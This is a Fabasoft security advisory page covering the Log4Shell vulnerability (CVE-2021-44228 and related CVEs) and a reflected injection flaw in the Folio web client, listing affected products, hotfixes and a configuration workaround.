First published: 13 December 2021
Last update: 22 December 2021
ID: FSC31322
Affected Components: Fabasoft Cloud, Fabasoft Folio
Severity: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, Basic Score: 10.0 (Critical)
Status: Final
CVEs: CVE-2021-44228
Informations for another Log4j issues CVE-2021-45046 and CVE-2021-45105 see at the end of this article.
A flaw was found in the Java logging library Apache Log4j in versions from 2.0.0 (including beta versions) up to and including 2.14.1. This allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.
In order to exploit this flaw you need:
A lot of software products and libraries use the Log4j library and therefore may be affected.
The following Fabasoft products may be affected by the vulnerability:
Not affected:
Fabasoft Folio Client and Fabasoft Cloud Client are not affected in any version of Fabasoft Folio / Fabasoft eGov-Suite.
You can check for the used library by doing a file search on your Fabasoft Folio and Mindbreeze servers:
Search for log4j* in:
Windows Folio: C:\Program Files\Fabasoft\
Windows Folio: C:\ProgramData\Fabasoft\INSTALLDIR
Windows Mindbreeze Enterprise: Search the full server for log4j*
Linux Folio: /var/opt/fabasoft/cache/INSTALLDIR
Linux Mindbreeze Enterprise: Search the full server for log4j*
If your company is developing own solutions or apps for your Fabasoft Folio installation with Java, check your repository for any Log4j dependencies. Also check all other used Java libraries that they haven't packaged the impacted Log4j library.
A hotfix was applied in the Fabasoft Business Process Cloud at 13. December 2021.
Mitigation measures were applied before. So far, there is no indication that the vulnerability has been exploited.
Although not affected, a version using log4j version 2.16.0 was applied in the Fabasoft Business Process Cloud at 19. December 2021.
Although not affected, a version using log4j version 2.17.0 was applied in the Fabasoft Business Process Cloud at 21. December 2021.
Currently, a hotfix is available for:
Fabasoft Folio 2021 November Release (build 21.11.0.150)
Fabasoft eGov-Suite 2021 November Release (build 21.11.0.150.007)
Please contact Fabasoft Enterprise Support to request a hotfix package for this version. The hotfixed products use at least log4j version 2.17.0.
It is strongly recommended to install the provided hotfix for Fabasoft Folio 2021 November Release or Fabasoft eGov-Suite 2021 November Release.
With a Java option for Log4j, the LDAP lookup, that causes the vulnerability, may be disabled.
For affected Fabasoft Folio 2021 versions, please use this workaround to disable the vulnerability on all servers:
Restart all Kernel instances on that machine.
Fabasoft Folio environment variables can be configured in two ways, see https://help.folio.fabasoft.com/index.php?topic=doc/Fabasoft-Folio-Envir... details.
Option 1 - Per server configuration
Option 2 - Per service configuration
Also if using option 1, double-check that the server-wide setting is not overwritten by the per-service configuration.
Add the following into the file
-Dlog4j2.formatMsgNoLookups=true
Make sure that no line-break is on the end of the file.
Restart all Kernel instances on that machine.
Additional vulnerabilities have been reported by the Log4j project (CVE-2021-45046 and CVE-2021-45105) when the logging configuration uses a non-default pattern layout.
Fabasoft Folio does not use the specific pattern layout in its code, therefore no Fabasoft Folio version and the Fabasoft Business Process Cloud are or were affected.
Nevertheless Fabasoft will update the Log4j library to version 2.17.0 to close CVE-2021-45105 in the hotfixed versions for CVE-2021-44228, and for all future releases.
Fabasoft Mindbreeze Enterprise does not use any of the vulnerable features, therefore no Fabasoft Mindbreeze Enterprise version is affected .
During investigations another vulnerability for Log4j Version 1.2 was identified, that is listed under CVE-2021-4104 with CVSS v3 Base Score 8.1 (High).
No Fabasoft Folio version is affected by CVE-2021-4104.
First published: 28 August 2021
Last update: 16 September 2021
ID: FSC29337
Affected Components: Fabasoft Folio Webservices, Fabasoft Cloud Webservices
Severity: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N, Basic Score: 7.3
Status: Final
CVEs: -
By passing a malicious content in a parameter to the first request in the Fabasoft Folio web client, an error will be returned that reflects this content. The content type of the response is not interpreted correctly and the malicious content is injected on the web browser client.
An attacker may send a link to a user containing the malicious content. If the user opens the link in the web browser, code may be executed in the current users’ context.
The parameter values are not part of the error message anymore.
A hotfix was applied in the Fabasoft Cloud at 16. August 2021.
A hotfix is provided for all supported Fabasoft Folio / Fabasoft eGov-Suite versions. It is recommended to install this hotfix.
Fixed with following versions of Fabasoft Folio:
A hotfix is provided for the following Fabasoft Folio versions:
Fixed with following versions of Fabasoft eGov-Suite:
A hotfix is provided for the following Fabasoft eGov-Suite versions: